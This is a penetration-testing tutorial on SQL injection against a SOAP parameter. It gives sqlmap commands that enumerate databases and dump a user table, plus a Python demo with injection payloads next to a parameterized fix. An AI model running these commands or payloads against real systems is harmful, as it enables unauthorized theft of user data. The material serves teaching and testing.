To test (and exploit) a SOAP message for SQL injection, do the following:
- Capture the request in Burp Suite (switch on intercept for the request).
- Copy the whole request and save it as a file. You can also first check by hand whether specific parameters in the request are vulnerable to SQL injection: in my example I replace the authToken parameter with a ' and get a "nice" error message back in the response.
- Run sqlmap against the saved request: sqlmap -r /root/Documents/wsdl.txt -p authToken, where /root/Documents/wsdl.txt is the file you saved and authToken is the parameter you want to test for SQLi.
- sqlmap reports that the parameter is vulnerable and that the backend database is MySQL.
- We can now move on to getting information out of the database. Enumerate the databases: sqlmap -r /root/Documents/wsdl.txt -p authToken --dbs
- We find the database we are after; in this example the database containing the users is called email3.
- Next stop: dump everything: sqlmap -r /root/Documents/wsdl.txt -p authToken --dbs --dump (to restrict the dump to the database found above, use -D email3 --dump instead of dumping everything sqlmap can reach).
- We get what we are after: the whole database, with a table called user and all the user information.
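To show why a single quote in a SOAP parameter produces that error and why sqlmap can then enumerate the database, here is an added example (it is not code from the original post, and the request and backend in it are constructed, not the author's capture): a minimal stand-in for the endpoint that parses the authToken element out of the SOAP body and concatenates it into SQL, beside the parameterized version that does not break. Assumed names: the `authToken` element, a `user` table with `email` and `token` columns, and SQLite standing in for the MySQL backend the post found.

```python
"""Added example, not from the original post.

Shows a raw HTTP request in the shape `sqlmap -r` reads (request line,
headers, blank line, SOAP body), the SOAP parameter being pulled out of
the XML the way a backend would, and a vulnerable lookup beside a safe one.
Assumptions (not in the original post): element name authToken, table
user(email, token), SQLite in place of the MySQL backend in the post.
"""
import sqlite3
import xml.etree.ElementTree as ET

# Constructed raw request in the form you would save from Burp for sqlmap -r.
# {token} marks where the tested parameter value goes.
RAW_REQUEST = (
    "POST /ws/UserService HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    "SOAPAction: \"urn:getUser\"\r\n"
    "\r\n"
    "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
    "<soapenv:Body><getUser><authToken>{token}</authToken></getUser></soapenv:Body>"
    "</soapenv:Envelope>"
)


def soap_param(raw_request: str, name: str) -> str:
    """Extract a parameter from the SOAP body the way the endpoint would:
    split off the HTTP headers, parse the XML, return the element's text."""
    body = raw_request.split("\r\n\r\n", 1)[1]
    root = ET.fromstring(body)
    el = root.find(".//" + name)
    return el.text if el is not None and el.text is not None else ""


def make_db() -> sqlite3.Connection:
    """Constructed user table standing in for the email3 database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, token TEXT)")
    conn.executemany(
        "INSERT INTO user (email, token) VALUES (?, ?)",
        [("alice@example.com", "a1b2c3"), ("bob@example.com", "d4e5f6")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, token: str):
    """Vulnerable lookup: the SOAP value is pasted into the SQL text.
    Returns (emails, error_message); error_message is what an error-based
    injection test (a lone quote) sees coming back in the response."""
    sql = "SELECT email FROM user WHERE token = '%s'" % token
    try:
        return [row[0] for row in conn.execute(sql)], None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


def lookup_safe(conn: sqlite3.Connection, token: str):
    """Fixed lookup: the value is bound as a parameter, never parsed as SQL."""
    sql = "SELECT email FROM user WHERE token = ?"
    return [row[0] for row in conn.execute(sql, (token,))], None


def probe(conn: sqlite3.Connection, payload: str, lookup=lookup_vulnerable):
    """Build the request with the payload in authToken and run it through
    the chosen lookup, mirroring what sqlmap does per test case."""
    request = RAW_REQUEST.format(token=payload)
    return lookup(conn, soap_param(request, "authToken"))


if __name__ == "__main__":
    db = make_db()
    print("legit token  :", probe(db, "a1b2c3"))
    print("single quote :", probe(db, "'"))            # error text comes back
    print("tautology    :", probe(db, "' OR '1'='1"))  # every row comes back
    print("safe lookup  :", probe(db, "' OR '1'='1", lookup_safe))
```

The lone quote in `probe(db, "'")` is the manual check from the post: the concatenated query becomes syntactically invalid and the database error text is what leaks into the SOAP response. The same request file, with the parameter left as `-p authToken`, is what sqlmap iterates over; the parameterized `lookup_safe` returns nothing for either payload and raises no error, which is the fix to ask for once the finding is reported.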